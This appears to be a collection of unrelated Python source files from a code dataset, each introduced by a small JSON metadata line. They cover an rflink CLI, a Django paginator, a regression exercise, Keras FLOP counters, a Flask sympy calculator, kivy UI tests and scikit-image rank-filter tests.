from .protocol import ( # noqa: unused-import
CommandSerialization,
EventHandling,
InverterProtocol,
PacketHandling,
ProtocolBase,
RepeaterProtocol,
RflinkProtocol,
create_rflink_connection,
)
PROTOCOLS = {
"command": RflinkProtocol,
"event": EventHandling,
"print": PacketHandling,
"invert": InverterProtocol,
"repeat": RepeaterProtocol,
} # type: Dict[str, Type[ProtocolBase]]
ALL_COMMANDS = ["on", "off", "allon", "alloff", "up", "down", "stop", "pair"]
def main(
argv: Sequence[str] = sys.argv[1:], loop: Optional[asyncio.AbstractEventLoop] = None
) -> None:
"""Parse argument and setup main program loop."""
args = docopt(
__doc__, argv=argv, version=pkg_resources.require("rflink")[0].version
)
level = logging.ERROR
if args["-v"]:
level = logging.INFO
if args["-v"] == 2:
level = logging.DEBUG
logging.basicConfig(level=level)
if not loop:
loop = asyncio.get_event_loop()
if args["--ignore"]:
ignore = args["--ignore"].split(",")
else:
ignore = []
command = next((c for c in ALL_COMMANDS if args[c] is True), None)
if command:
protocol_type = PROTOCOLS["command"]
else:
protocol_type = PROTOCOLS[args["-m"]]
conn = create_rflink_connection(
protocol=protocol_type,
host=args["--host"],
port=args["--port"],
baud=args["--baud"],
loop=loop,
ignore=ignore,
)
transport, protocol = loop.run_until_complete(conn)
try:
if command:
assert isinstance(protocol, CommandSerialization)
for _ in range(int(args["--repeat"])):
loop.run_until_complete(
protocol.send_command_ack(args["<id>"], command)
)
else:
loop.run_forever()
except KeyboardInterrupt:
# cleanup connection
transport.close()
loop.run_forever()
finally:
loop.close()
```
|
{
"source": "jeyrce/vshare",
"score": 3
}
|
#### File: vshare/utils/page_breaker.py
```python
from django.core.paginator import Paginator
# Pagination helper
def pagebreaker(queryset, num=1, perpage=10):
    '''
    :param queryset: the data set to paginate
    :param num: the page number to return after pagination
    :param perpage: number of records per page
    :return: the page contents for num, the page-number range, and the total number of pages
    '''
num = int(num)
page_datas = Paginator(queryset, per_page=perpage)
    # keep the requested page number within bounds
if num <= 0:
num = 1
if num > page_datas.num_pages:
num = page_datas.num_pages
    # build the page numbers needed by the front end
    # start number; the 10 here means a pagination bar shows at most 10 page links
start = ((num - 1) // 10) * 10 + 1
    # end number
end = start + 10
    # make sure end does not run past the last page
if end > page_datas.num_pages:
end = page_datas.num_pages
return page_datas.page(num), range(start, end + 1), page_datas.num_pages
if __name__ == '__main__':
pass
```
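A small usage sketch of the helper above, run in the same module and using a plain list in place of a QuerySet (Django's `Paginator` accepts either); the numbers are arbitrary.

```python
page, page_numbers, total_pages = pagebreaker(list(range(95)), num=2, perpage=10)
print(list(page.object_list))  # [10, 11, ..., 19] - the second page of 10 records
print(list(page_numbers))      # [1, 2, ..., 10]   - page links for the pagination bar
print(total_pages)             # 10
```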
|
{
"source": "JeysonAc/machinelearning-az",
"score": 4
}
|
#### File: Exercises/Regression/multiple_linear_regression.py
```python
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
#Dataset
dataset = pd.read_csv("../../datasets/Part 2 - Regression/Section 5 - Multiple Linear Regression/50_Startups.csv")
x = dataset.iloc[:,:-1].values
y = dataset.iloc[:,4].values
# Handling of categorical variables
from sklearn.preprocessing import LabelEncoder, OneHotEncoder
labelencoder_x = LabelEncoder()
x[:,3] = labelencoder_x.fit_transform(x[:,3])
onehotencoder = OneHotEncoder(categorical_features=[3])
x = onehotencoder.fit_transform(x).toarray()
# Avoid the dummy variable trap
x = x[:,1:]
# Split the dataset into training and test sets
from sklearn.model_selection import train_test_split
x_train,x_test,y_train,y_test = train_test_split(x,y,test_size=0.2,random_state=0)
#------------------ MODEL BUILDING ---------------------
# Fit the model on the training set (all-in)
from sklearn.linear_model import LinearRegression
regression = LinearRegression()
regression.fit(x_train,y_train)
# Predict results on the test set
y_pred = regression.predict(x_test)
# Fit the optimal model with backward elimination
import statsmodels.api as sm
x = np.append(arr = np.ones((50,1)).astype(int),values = x, axis = 1)
x_opt = x[:,[0,1,2,3,4,5]]
sl = 0.05
"""
x_opt = x[:,[0,1,2,3,4,5]]
regression_ols = sm.OLS(endog=y,exog=x_opt).fit()
regression_ols.summary()
x_opt = x[:,[0,1,3,4,5]]
regression_ols = sm.OLS(endog=y,exog=x_opt).fit()
regression_ols.summary()
x_opt = x[:,[0,3,4,5]]
regression_ols = sm.OLS(endog=y,exog=x_opt).fit()
regression_ols.summary()
x_opt = x[:,[0,3,5]]
regression_ols = sm.OLS(endog=y,exog=x_opt).fit()
regression_ols.summary()
x_opt = x[:,[0,3]]
regression_ols = sm.OLS(endog=y,exog=x_opt).fit()
regression_ols.summary()
"""
def backwardElimination(x,sl):
numVars=len(x[0])
for i in range(0,numVars):
regressor_ols = sm.OLS(y,x.tolist()).fit()
maxVar = max(regressor_ols.pvalues).astype(float)
if maxVar > sl:
for j in range(0,numVars-i):
if(regressor_ols.pvalues[j].astype(float) == maxVar):
x = np.delete(x,j,1)
regressor_ols.summary()
return x
x_modeled = backwardElimination(x_opt,sl)
```
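A sketch of what typically follows the backward elimination above (continuing from the arrays already built): refit OLS on the surviving columns to read off the reduced model.

```python
final_ols = sm.OLS(y, x_modeled.tolist()).fit()
print(final_ols.summary())  # only the predictors whose p-values stayed below sl = 0.05 remain
```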
|
{
"source": "JeysonCastilloAI/flopco-keras",
"score": 3
}
|
#### File: flopco-keras/flopco_keras/compute_layer_flops.py
```python
def numel(w : list):
out = 1
for k in w:
out *= k
return int(out)
def compute_input_flops(layer, macs = False):
return 0
def compute_TFOpLambda(layer, macs = False):
return 0
def compute_padding_flops(layer, macs = False):
return 0
def compute_activation_flops(layer, macs = False):
return 0
def compute_tfop_flops(layer, macs = False):
return 0
def compute_add_flops(layer, macs = False):
return 0
def compute_flatten(layer, macs = False):
return 0
def compute_conv1d_flops(layer, macs = False):
if layer.data_format == "channels_first":
_, input_channels, _, = layer.input_shape
_, output_channels, w, = layer.output_shape
elif layer.data_format == "channels_last":
_, _, input_channels = layer.input_shape
_, w, output_channels = layer.output_shape
w_w = layer.kernel_size[0]
flops = w * output_channels * input_channels * w_w
if not macs:
if layer.use_bias == True:
flops_bias = layer.output_shape[1]*layer.output_shape[2]
elif layer.use_bias == False:
flops_bias = 0
flops = 2*int(flops)+flops_bias
return int(flops)
def compute_zeroflops(layer, macs = False):
return 0
def compute_conv2d_flops(layer, macs = False):
# _, cin, h, w = input_shape
if layer.data_format == "channels_first":
_, input_channels, _, _ = layer.input_shape
_, output_channels, h, w, = layer.output_shape
elif layer.data_format == "channels_last":
_, _, _, input_channels = layer.input_shape
_, h, w, output_channels = layer.output_shape
w_h, w_w = layer.kernel_size
# flops = h * w * output_channels * input_channels * w_h * w_w / (stride**2)
flops = h * w * output_channels * input_channels * w_h * w_w
if not macs:
        flops_bias = numel(layer.output_shape[1:]) if layer.use_bias else 0  # count bias adds only when the layer has a bias
flops = 2 * flops + flops_bias
return int(flops)
def compute_fc_flops(layer, macs = False):
ft_in, ft_out = layer.input_shape[-1], layer.output_shape[-1]
flops = ft_in * ft_out
if not macs:
        flops_bias = ft_out if layer.use_bias else 0  # count bias adds only when the layer has a bias
flops = 2 * flops + flops_bias
return int(flops)
def compute_bn2d_flops(layer, macs = False):
# subtract, divide, gamma, beta
flops = 2 * numel(layer.input_shape[1:])
if not macs:
flops *= 2
return int(flops)
def compute_relu_flops(layer, macs = False):
flops = 0
if not macs:
flops = numel(layer.output_shape[1:])
return int(flops)
def compute_maxpool2d_flops(layer, macs = False):
flops = 0
if not macs:
flops = layer.pool_size[0]**2 * numel(layer.output_shape[1:])
return flops
def compute_maxpool1d_flops(layer, macs = False):
flops = 0
if not macs:
flops = layer.pool_size[0]*2 * numel(layer.output_shape[1:])
return flops
def compute_pool2d_flops(layer, macs = False):
flops = 0
if not macs:
flops = layer.pool_size[0]**2 * numel(layer.output_shape[1:])
return flops
def compute_globalavgpool2d_flops(layer, macs = False):
if layer.data_format == "channels_first":
_, input_channels, h, w = layer.input_shape
_, output_channels = layer.output_shape
elif layer.data_format == "channels_last":
_, h, w, input_channels = layer.input_shape
_, output_channels = layer.output_shape
return h*w
def compute_softmax_flops(layer, macs = False):
nfeatures = numel(layer.input_shape[1:])
total_exp = nfeatures # https://stackoverflow.com/questions/3979942/what-is-the-complexity-real-cost-of-exp-in-cmath-compared-to-a-flop
total_add = nfeatures - 1
total_div = nfeatures
flops = total_div + total_exp
if not macs:
flops += total_add
return flops
```
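To make the conv2d count above concrete, a worked example for a hypothetical layer with channels_last output `(None, 32, 32, 64)`, 3 input channels, a 3x3 kernel and bias enabled (i.e. `compute_conv2d_flops` with `macs=False`):

```python
h, w, out_c, in_c, k_h, k_w = 32, 32, 64, 3, 3, 3
macs = h * w * out_c * in_c * k_h * k_w   # 1,769,472 multiply-accumulates
flops = 2 * macs + h * w * out_c          # 3,604,480 FLOPs once the bias additions are counted
print(macs, flops)
```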
|
{
"source": "JeysonFlores/AlgebraicCalc",
"score": 3
}
|
#### File: JeysonFlores/AlgebraicCalc/Osi.py
```python
from flask import Flask, render_template
from flask import request
from sympy.solvers import solve
from sympy import plot
import json
import Operaciones as o
import Forms1
import time
app = Flask(__name__)
#------------------------------------- Equations -------------------------
@app.route("/Ecuaciones", methods = ['GET', 'POST'])
def main_ec():
graf=""
ec_form = Forms1.Formularios_EC(request.form)
ecr=""
if (request.method) == 'POST':
ec=str(ec_form.Ecuacion.data)
if(ec==''):
ecr='CampoVacio'
else:
try:
ecr = solve(ec)
except Exception as e:
ecr = "Sintaxis Inválida"
if(ecr!='Sintaxis Inválida'):
graf=o.Graficar(ec)
if(graf=="Sintaxis Inválida"):
ecr = graf
graf = None
#ecr = o.Reem(ecr)
return render_template('Ecuaciones.html', formu = ec_form, res = ecr, graf=graf,no_cache=time.time())
#---------------------------------------------- Inequalities ---------------
@app.route("/Desigualdades", methods = ['GET', 'POST'])
def main_des():
ec_form = Forms1.Formulario_DES(request.form)
ecr=""
if (request.method) == 'POST':
ec=str(ec_form.Ecuacion.data)
if(ec==''):
ecr=''
else:
try:
ecr = solve(ec, "x")
except Exception as e:
ecr = "Sintaxis Inválida"
return render_template('Main.html', formu = ec_form, res = ecr)
#------------------ Cartesian products -------------------------------
@app.route("/Prods", methods = ['GET', 'POST'])
def main_prod():
prod_form = Forms1.Formularios_AXB(request.form)
prod = ""
axb = ""
oie = ""
funk = ""
if (request.method) == 'POST':
a = str(prod_form.A.data)
b = str(prod_form.B.data)
if((a=="") or (b=="")):
oie="Error: Uno de los campos está vacío"
else:
a = o.Conjunto(a)
b = o.Conjunto(b)
axb,funk = o.prod_cart(a,b)
return render_template("prod_cart.html", formu = prod_form, axb = axb,error = oie, funk = funk)
#-------------------------------------Matrices-------------------------
@app.route("/M1", methods = ['GET', 'POST'])
def main_mat1():
return render_template("MatrizUna.html",no_cache=time.time())
@app.route("/M2")
def main_mat2():
return render_template("MatrizDos.html")
@app.route("/Vectores", methods = ['GET', 'POST'])
def main_vec():
return render_template("Vectores.html",no_cache=time.time())
@app.route("/FAQ",methods = ['GET', 'POST'])
def main_faq():
return render_template("FAQ.html")
if __name__ == '__main__':
app.run(debug=True)
```
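The routes above mostly delegate to `sympy.solve`; a minimal sketch of that call outside Flask (the equation string is arbitrary):

```python
from sympy.solvers import solve

print(solve("x**2 - 4"))  # [-2, 2]
```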
|
{
"source": "jeysonmc/kibot",
"score": 3
}
|
#### File: jeysonmc/kibot/tests.py
```python
import unittest
from unittest import TestCase
from kibot import KibotTestCase, run_kibot_tests, WidgetNotFoundError
from kivy.factory import Factory
class TestKibot(KibotTestCase):
"""Kibot testing"""
def test_find(self):
widget = self.kibot.find(text="Kibot Test")
self.assertEqual(widget, self.app.root.my_button)
def test_find_by_class(self):
widget = self.kibot.find(class_="Button")
self.assertEqual(widget, self.app.root.my_button)
def test_find_by_id(self):
widget = self.kibot.find(id="_my_button")
self.assertEqual(widget, self.app.root.my_button)
def test_do(self):
from functools import partial
x = []
def test(x):
x.append(1)
self.kibot.do(partial(test, x))
self.kibot.wait_until()
self.assertEqual(x[0], 1)
def test_wait(self):
import time
k = time.time()
self.kibot.wait(2)
self.kibot.do(lambda dt: dt)
self.kibot.wait_until()
self.assertGreaterEqual(time.time() - k, 2)
def test_do_press(self):
self.kibot.do_press(widget=self.app.root.slider, x=0.5, y=0.5)
self.kibot.wait_until()
self.assertEqual(self.app.root.slider.value, 50)
def test_do_release(self):
self.kibot.do_release()
def test_do_click(self):
self.kibot.do_press(widget=self.app.root.my_button)
self.kibot.wait_until()
self.assertEqual(self.app.root.my_button.text, "Pressed!")
def test_do_move(self):
widget = self.app.root.slider
self.kibot.do_press(widget=widget, x=0.0, y=0.5)
self.kibot.do_move(widget=widget, x=0.5, y=0.5)
self.kibot.do_release(widget=widget, x=0.5, y=0.5)
self.kibot.wait_until()
self.assertEqual(widget.value, 50)
def test_do_keystroke(self):
widget = self.app.root.textinput
self.kibot.do_click(widget=widget)
self.kibot.do_keystroke('h')
self.kibot.do_keystroke(text='ello world')
self.kibot.wait_until()
self.assertEqual("hello world", widget.text)
def test_record(self):
self.kibot.record('delete.kibot')
self.kibot.do_press(x=0, y=100)
self.kibot.wait_until()
self.assertEqual("do_press" in str(self.kibot.recorded_commands), True)
def test_execute_record(self):
widget = self.app.root.my_button
try:
with open("delete.kibot", 'w') as f:
f.write("self.do_press(x=100, y=100)")
self.kibot.execute_record("delete.kibot")
self.kibot.wait_until()
except Exception as e:
raise e
finally:
import os
os.remove("delete.kibot")
self.assertEqual(widget.text, "Pressed!")
if __name__ == '__main__':
from kivy.app import App
from kivy.lang import Builder
kv = """
<RootWidget@BoxLayout>:
orientation: 'vertical'
my_button: _my_button
slider: _slider
textinput: _tinput
lbl: _lbl
BoxLayout:
Button:
id: _my_button
text: "Kibot Test"
on_press: self.text="Pressed!"
TextInput:
id: _tinput
Slider:
id: _slider
step: 1
on_value: _lbl.text="%s"%(self.value)
Label:
id: _lbl
size_hint_y: 0.1
"""
class TestApp(App):
def build(self):
return Factory.RootWidget()
Builder.load_string(kv)
app = TestApp()
run_kibot_tests(app) # This runs the app and calls unittest.main()
```
|
{
"source": "jeysonmc/scikit-image",
"score": 2
}
|
#### File: rank/tests/test_rank.py
```python
import numpy as np
from numpy.testing import run_module_suite, assert_array_equal, assert_raises
from skimage import img_as_ubyte, img_as_uint, img_as_float
from skimage import data, util
from skimage.morphology import cmorph, disk
from skimage.filter import rank
def test_random_sizes():
# make sure the size is not a problem
niter = 10
elem = np.array([[1, 1, 1], [1, 1, 1], [1, 1, 1]], dtype=np.uint8)
for m, n in np.random.random_integers(1, 100, size=(10, 2)):
mask = np.ones((m, n), dtype=np.uint8)
image8 = np.ones((m, n), dtype=np.uint8)
out8 = np.empty_like(image8)
rank.mean(image=image8, selem=elem, mask=mask, out=out8,
shift_x=0, shift_y=0)
assert_array_equal(image8.shape, out8.shape)
rank.mean(image=image8, selem=elem, mask=mask, out=out8,
shift_x=+1, shift_y=+1)
assert_array_equal(image8.shape, out8.shape)
image16 = np.ones((m, n), dtype=np.uint16)
out16 = np.empty_like(image8, dtype=np.uint16)
rank.mean(image=image16, selem=elem, mask=mask, out=out16,
shift_x=0, shift_y=0)
assert_array_equal(image16.shape, out16.shape)
rank.mean(image=image16, selem=elem, mask=mask, out=out16,
shift_x=+1, shift_y=+1)
assert_array_equal(image16.shape, out16.shape)
rank.mean_percentile(image=image16, mask=mask, out=out16,
selem=elem, shift_x=0, shift_y=0, p0=.1, p1=.9)
assert_array_equal(image16.shape, out16.shape)
rank.mean_percentile(image=image16, mask=mask, out=out16,
selem=elem, shift_x=+1, shift_y=+1, p0=.1, p1=.9)
assert_array_equal(image16.shape, out16.shape)
def test_compare_with_cmorph_dilate():
# compare the result of maximum filter with dilate
image = (np.random.random((100, 100)) * 256).astype(np.uint8)
out = np.empty_like(image)
mask = np.ones(image.shape, dtype=np.uint8)
for r in range(1, 20, 1):
elem = np.ones((r, r), dtype=np.uint8)
rank.maximum(image=image, selem=elem, out=out, mask=mask)
cm = cmorph._dilate(image=image, selem=elem)
assert_array_equal(out, cm)
def test_compare_with_cmorph_erode():
# compare the result of maximum filter with erode
image = (np.random.random((100, 100)) * 256).astype(np.uint8)
out = np.empty_like(image)
mask = np.ones(image.shape, dtype=np.uint8)
for r in range(1, 20, 1):
elem = np.ones((r, r), dtype=np.uint8)
rank.minimum(image=image, selem=elem, out=out, mask=mask)
cm = cmorph._erode(image=image, selem=elem)
assert_array_equal(out, cm)
def test_bitdepth():
# test the different bit depth for rank16
elem = np.ones((3, 3), dtype=np.uint8)
out = np.empty((100, 100), dtype=np.uint16)
mask = np.ones((100, 100), dtype=np.uint8)
for i in range(5):
image = np.ones((100, 100), dtype=np.uint16) * 255 * 2 ** i
r = rank.mean_percentile(image=image, selem=elem, mask=mask,
out=out, shift_x=0, shift_y=0, p0=.1, p1=.9)
def test_population():
# check the number of valid pixels in the neighborhood
image = np.zeros((5, 5), dtype=np.uint8)
elem = np.ones((3, 3), dtype=np.uint8)
out = np.empty_like(image)
mask = np.ones(image.shape, dtype=np.uint8)
rank.pop(image=image, selem=elem, out=out, mask=mask)
r = np.array([[4, 6, 6, 6, 4],
[6, 9, 9, 9, 6],
[6, 9, 9, 9, 6],
[6, 9, 9, 9, 6],
[4, 6, 6, 6, 4]])
assert_array_equal(r, out)
def test_structuring_element8():
# check the output for a custom structuring element
r = np.array([[0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0],
[0, 0, 255, 0, 0, 0],
[0, 0, 255, 255, 255, 0],
[0, 0, 0, 255, 255, 0],
[0, 0, 0, 0, 0, 0]])
# 8-bit
image = np.zeros((6, 6), dtype=np.uint8)
image[2, 2] = 255
elem = np.asarray([[1, 1, 0], [1, 1, 1], [0, 0, 1]], dtype=np.uint8)
out = np.empty_like(image)
mask = np.ones(image.shape, dtype=np.uint8)
rank.maximum(image=image, selem=elem, out=out, mask=mask,
shift_x=1, shift_y=1)
assert_array_equal(r, out)
# 16-bit
image = np.zeros((6, 6), dtype=np.uint16)
image[2, 2] = 255
out = np.empty_like(image)
rank.maximum(image=image, selem=elem, out=out, mask=mask,
shift_x=1, shift_y=1)
assert_array_equal(r, out)
def test_pass_on_bitdepth():
# should pass because data bitdepth is not too high for the function
image = np.ones((100, 100), dtype=np.uint16) * 2 ** 11
elem = np.ones((3, 3), dtype=np.uint8)
out = np.empty_like(image)
mask = np.ones(image.shape, dtype=np.uint8)
def test_inplace_output():
# rank filters are not supposed to filter inplace
selem = disk(20)
image = (np.random.random((500, 500)) * 256).astype(np.uint8)
out = image
assert_raises(NotImplementedError, rank.mean, image, selem, out=out)
def test_compare_autolevels():
# compare autolevel and percentile autolevel with p0=0.0 and p1=1.0
    # should return the same arrays
image = util.img_as_ubyte(data.camera())
selem = disk(20)
loc_autolevel = rank.autolevel(image, selem=selem)
loc_perc_autolevel = rank.autolevel_percentile(image, selem=selem,
p0=.0, p1=1.)
assert_array_equal(loc_autolevel, loc_perc_autolevel)
def test_compare_autolevels_16bit():
    # compare autolevel (16-bit) and percentile autolevel (16-bit) with p0=0.0
    # and p1=1.0; they should return the same arrays
image = data.camera().astype(np.uint16) * 4
selem = disk(20)
loc_autolevel = rank.autolevel(image, selem=selem)
loc_perc_autolevel = rank.autolevel_percentile(image, selem=selem,
p0=.0, p1=1.)
assert_array_equal(loc_autolevel, loc_perc_autolevel)
def test_compare_ubyte_vs_float():
    # Create a uint8 image and a float copy of it
image_uint = img_as_ubyte(data.camera()[:50, :50])
image_float = img_as_float(image_uint)
methods = ['autolevel', 'bottomhat', 'equalize', 'gradient', 'threshold',
'subtract_mean', 'enhance_contrast', 'pop', 'tophat']
for method in methods:
func = getattr(rank, method)
out_u = func(image_uint, disk(3))
out_f = func(image_float, disk(3))
assert_array_equal(out_u, out_f)
def test_compare_8bit_unsigned_vs_signed():
    # filters applied on an unsigned 8-bit image or its signed 8-bit counterpart
    # should give identical results
    # Create a signed int8 image and convert it to uint8
image = img_as_ubyte(data.camera())
image[image > 127] = 0
image_s = image.astype(np.int8)
image_u = img_as_ubyte(image_s)
assert_array_equal(image_u, img_as_ubyte(image_s))
methods = ['autolevel', 'bottomhat', 'equalize', 'gradient', 'maximum',
'mean', 'subtract_mean', 'median', 'minimum', 'modal',
'enhance_contrast', 'pop', 'threshold', 'tophat']
for method in methods:
func = getattr(rank, method)
out_u = func(image_u, disk(3))
out_s = func(image_s, disk(3))
assert_array_equal(out_u, out_s)
def test_compare_8bit_vs_16bit():
    # filters applied on an 8-bit image or a 16-bit image (having only 8 real bits
    # of dynamic range) should give identical results
image8 = util.img_as_ubyte(data.camera())
image16 = image8.astype(np.uint16)
assert_array_equal(image8, image16)
methods = ['autolevel', 'bottomhat', 'equalize', 'gradient', 'maximum',
'mean', 'subtract_mean', 'median', 'minimum', 'modal',
'enhance_contrast', 'pop', 'threshold', 'tophat']
for method in methods:
func = getattr(rank, method)
f8 = func(image8, disk(3))
f16 = func(image16, disk(3))
assert_array_equal(f8, f16)
def test_trivial_selem8():
    # check that min, max and mean return the identity if the structuring element
    # contains only the central pixel
image = np.zeros((5, 5), dtype=np.uint8)
out = np.zeros_like(image)
mask = np.ones_like(image, dtype=np.uint8)
image[2, 2] = 255
image[2, 3] = 128
image[1, 2] = 16
elem = np.array([[0, 0, 0], [0, 1, 0], [0, 0, 0]], dtype=np.uint8)
rank.mean(image=image, selem=elem, out=out, mask=mask,
shift_x=0, shift_y=0)
assert_array_equal(image, out)
rank.minimum(image=image, selem=elem, out=out, mask=mask,
shift_x=0, shift_y=0)
assert_array_equal(image, out)
rank.maximum(image=image, selem=elem, out=out, mask=mask,
shift_x=0, shift_y=0)
assert_array_equal(image, out)
def test_trivial_selem16():
    # check that min, max and mean return the identity if the structuring element
    # contains only the central pixel
image = np.zeros((5, 5), dtype=np.uint16)
out = np.zeros_like(image)
mask = np.ones_like(image, dtype=np.uint8)
image[2, 2] = 255
image[2, 3] = 128
image[1, 2] = 16
elem = np.array([[0, 0, 0], [0, 1, 0], [0, 0, 0]], dtype=np.uint8)
rank.mean(image=image, selem=elem, out=out, mask=mask,
shift_x=0, shift_y=0)
assert_array_equal(image, out)
rank.minimum(image=image, selem=elem, out=out, mask=mask,
shift_x=0, shift_y=0)
assert_array_equal(image, out)
rank.maximum(image=image, selem=elem, out=out, mask=mask,
shift_x=0, shift_y=0)
assert_array_equal(image, out)
def test_smallest_selem8():
    # check that min, max and mean return the identity if the structuring element
    # contains only the central pixel
image = np.zeros((5, 5), dtype=np.uint8)
out = np.zeros_like(image)
mask = np.ones_like(image, dtype=np.uint8)
image[2, 2] = 255
image[2, 3] = 128
image[1, 2] = 16
elem = np.array([[1]], dtype=np.uint8)
rank.mean(image=image, selem=elem, out=out, mask=mask,
shift_x=0, shift_y=0)
assert_array_equal(image, out)
rank.minimum(image=image, selem=elem, out=out, mask=mask,
shift_x=0, shift_y=0)
assert_array_equal(image, out)
rank.maximum(image=image, selem=elem, out=out, mask=mask,
shift_x=0, shift_y=0)
assert_array_equal(image, out)
def test_smallest_selem16():
    # check that min, max and mean return the identity if the structuring element
    # contains only the central pixel
image = np.zeros((5, 5), dtype=np.uint16)
out = np.zeros_like(image)
mask = np.ones_like(image, dtype=np.uint8)
image[2, 2] = 255
image[2, 3] = 128
image[1, 2] = 16
elem = np.array([[1]], dtype=np.uint8)
rank.mean(image=image, selem=elem, out=out, mask=mask,
shift_x=0, shift_y=0)
assert_array_equal(image, out)
rank.minimum(image=image, selem=elem, out=out, mask=mask,
shift_x=0, shift_y=0)
assert_array_equal(image, out)
rank.maximum(image=image, selem=elem, out=out, mask=mask,
shift_x=0, shift_y=0)
assert_array_equal(image, out)
def test_empty_selem():
    # check that min, max and mean return zeros if the structuring element is
    # empty
image = np.zeros((5, 5), dtype=np.uint16)
out = np.zeros_like(image)
mask = np.ones_like(image, dtype=np.uint8)
res = np.zeros_like(image)
image[2, 2] = 255
image[2, 3] = 128
image[1, 2] = 16
elem = np.array([[0, 0, 0], [0, 0, 0]], dtype=np.uint8)
rank.mean(image=image, selem=elem, out=out, mask=mask,
shift_x=0, shift_y=0)
assert_array_equal(res, out)
rank.minimum(image=image, selem=elem, out=out, mask=mask,
shift_x=0, shift_y=0)
assert_array_equal(res, out)
rank.maximum(image=image, selem=elem, out=out, mask=mask,
shift_x=0, shift_y=0)
assert_array_equal(res, out)
def test_otsu():
# test the local Otsu segmentation on a synthetic image
# (left to right ramp * sinus)
test = np.tile([128, 145, 103, 127, 165, 83, 127, 185, 63, 127, 205, 43,
127, 225, 23, 127],
(16, 1))
test = test.astype(np.uint8)
res = np.tile([1, 1, 0, 1, 1, 0, 1, 1, 0, 1, 1, 0, 1, 1, 0, 1], (16, 1))
selem = np.ones((6, 6), dtype=np.uint8)
th = 1 * (test >= rank.otsu(test, selem))
assert_array_equal(th, res)
def test_entropy():
# verify that entropy is coherent with bitdepth of the input data
selem = np.ones((16, 16), dtype=np.uint8)
# 1 bit per pixel
data = np.tile(np.asarray([0, 1]), (100, 100)).astype(np.uint8)
assert(np.max(rank.entropy(data, selem)) == 1)
# 2 bit per pixel
data = np.tile(np.asarray([[0, 1], [2, 3]]), (10, 10)).astype(np.uint8)
assert(np.max(rank.entropy(data, selem)) == 2)
# 3 bit per pixel
data = np.tile(
np.asarray([[0, 1, 2, 3], [4, 5, 6, 7]]), (10, 10)).astype(np.uint8)
assert(np.max(rank.entropy(data, selem)) == 3)
# 4 bit per pixel
data = np.tile(
np.reshape(np.arange(16), (4, 4)), (10, 10)).astype(np.uint8)
assert(np.max(rank.entropy(data, selem)) == 4)
# 6 bit per pixel
data = np.tile(
np.reshape(np.arange(64), (8, 8)), (10, 10)).astype(np.uint8)
assert(np.max(rank.entropy(data, selem)) == 6)
# 8-bit per pixel
data = np.tile(
np.reshape(np.arange(256), (16, 16)), (10, 10)).astype(np.uint8)
assert(np.max(rank.entropy(data, selem)) == 8)
# 12 bit per pixel
selem = np.ones((64, 64), dtype=np.uint8)
data = np.tile(
np.reshape(np.arange(4096), (64, 64)), (2, 2)).astype(np.uint16)
assert(np.max(rank.entropy(data, selem)) == 12)
# make sure output is of dtype double
out = rank.entropy(data, np.ones((16, 16), dtype=np.uint8))
assert out.dtype == np.double
def test_selem_dtypes():
image = np.zeros((5, 5), dtype=np.uint8)
out = np.zeros_like(image)
mask = np.ones_like(image, dtype=np.uint8)
image[2, 2] = 255
image[2, 3] = 128
image[1, 2] = 16
for dtype in (np.uint8, np.uint16, np.int32, np.int64,
np.float32, np.float64):
elem = np.array([[0, 0, 0], [0, 1, 0], [0, 0, 0]], dtype=dtype)
rank.mean(image=image, selem=elem, out=out, mask=mask,
shift_x=0, shift_y=0)
assert_array_equal(image, out)
rank.mean_percentile(image=image, selem=elem, out=out, mask=mask,
shift_x=0, shift_y=0)
assert_array_equal(image, out)
def test_16bit():
image = np.zeros((21, 21), dtype=np.uint16)
selem = np.ones((3, 3), dtype=np.uint8)
for bitdepth in range(17):
value = 2 ** bitdepth - 1
image[10, 10] = value
assert rank.minimum(image, selem)[10, 10] == 0
assert rank.maximum(image, selem)[10, 10] == value
assert rank.mean(image, selem)[10, 10] == int(value / selem.size)
def test_bilateral():
image = np.zeros((21, 21), dtype=np.uint16)
selem = np.ones((3, 3), dtype=np.uint8)
image[10, 10] = 1000
image[10, 11] = 1010
image[10, 9] = 900
assert rank.mean_bilateral(image, selem, s0=1, s1=1)[10, 10] == 1000
assert rank.pop_bilateral(image, selem, s0=1, s1=1)[10, 10] == 1
assert rank.mean_bilateral(image, selem, s0=11, s1=11)[10, 10] == 1005
assert rank.pop_bilateral(image, selem, s0=11, s1=11)[10, 10] == 2
def test_percentile_min():
# check that percentile p0 = 0 is identical to local min
img = data.camera()
img16 = img.astype(np.uint16)
selem = disk(15)
# check for 8bit
img_p0 = rank.percentile(img, selem=selem, p0=0)
img_min = rank.minimum(img, selem=selem)
assert_array_equal(img_p0, img_min)
# check for 16bit
img_p0 = rank.percentile(img16, selem=selem, p0=0)
img_min = rank.minimum(img16, selem=selem)
assert_array_equal(img_p0, img_min)
def test_percentile_max():
# check that percentile p0 = 1 is identical to local max
img = data.camera()
img16 = img.astype(np.uint16)
selem = disk(15)
# check for 8bit
img_p0 = rank.percentile(img, selem=selem, p0=1.)
img_max = rank.maximum(img, selem=selem)
assert_array_equal(img_p0, img_max)
# check for 16bit
img_p0 = rank.percentile(img16, selem=selem, p0=1.)
img_max = rank.maximum(img16, selem=selem)
assert_array_equal(img_p0, img_max)
def test_percentile_median():
# check that percentile p0 = 0.5 is identical to local median
img = data.camera()
img16 = img.astype(np.uint16)
selem = disk(15)
# check for 8bit
img_p0 = rank.percentile(img, selem=selem, p0=.5)
img_max = rank.median(img, selem=selem)
assert_array_equal(img_p0, img_max)
# check for 16bit
img_p0 = rank.percentile(img16, selem=selem, p0=.5)
img_max = rank.median(img16, selem=selem)
assert_array_equal(img_p0, img_max)
def test_sum():
# check the number of valid pixels in the neighborhood
image8 = np.array([[0, 0, 0, 0, 0],
[0, 1, 1, 1, 0],
[0, 1, 1, 1, 0],
[0, 1, 1, 1, 0],
[0, 0, 0, 0, 0]], dtype=np.uint8)
image16 = 400*np.array([[0, 0, 0, 0, 0],
[0, 1, 1, 1, 0],
[0, 1, 1, 1, 0],
[0, 1, 1, 1, 0],
[0, 0, 0, 0, 0]], dtype=np.uint16)
elem = np.ones((3, 3), dtype=np.uint8)
out8 = np.empty_like(image8)
out16 = np.empty_like(image16)
mask = np.ones(image8.shape, dtype=np.uint8)
r = np.array([[1, 2, 3, 2, 1],
[2, 4, 6, 4, 2],
[3, 6, 9, 6, 3],
[2, 4, 6, 4, 2],
[1, 2, 3, 2, 1]], dtype=np.uint8)
rank.sum(image=image8, selem=elem, out=out8, mask=mask)
